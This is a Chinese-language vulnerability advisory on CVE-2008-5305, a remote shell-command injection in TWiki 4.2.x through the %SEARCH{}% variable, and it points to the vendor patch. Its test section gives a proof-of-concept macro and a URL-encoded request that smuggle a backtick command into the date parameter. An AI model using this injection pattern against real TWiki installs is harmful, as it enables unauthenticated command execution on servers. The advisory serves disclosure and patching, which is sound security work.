发布日期：2008-12-06
更新日期：2008-12-09

受影响系统：

TWiki TWiki 4.2.x

不受影响系统：

TWiki TWiki 4.2.4

描述：

---

BUGTRAQ  ID: 32668
CVE(CAN) ID: CVE-2008-5305

TWiki是一款灵活易用、功能强大的企业协作平台和知识管理系统。

由于没有正确地过滤对perl eval命令所传送的输入，远程攻击者可以通过向TWiki提交恶意的%SEARCH{}%变量或GET URL导致向Perl反引号（``）运算中注入并执行SHELL命令。如果没有对TWiki执行访问限制的话，攻击者无需认证便可以使用SEARCH变量。

<*来源：Troy Bollinger
  
  链接：http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2008-5305?cover=print
        http://secunia.com/advisories/33040/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

%SEARCH{ date="P`pr -?`" search="xyzzy" }%

http://example.org/twiki/bin/view/Main/WebSearch?search=%25SEARCH%7Bdate%3D%22P%60pr+-%3F%60%22+search%3D%22xyzzy%22%7D%25&scope=all

建议：

---

厂商补丁：

TWiki
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://twiki.org/cgi-bin/view/Codev/TWikiRelease04x02x04

浏览次数：2600
严重程度：0（网友投票）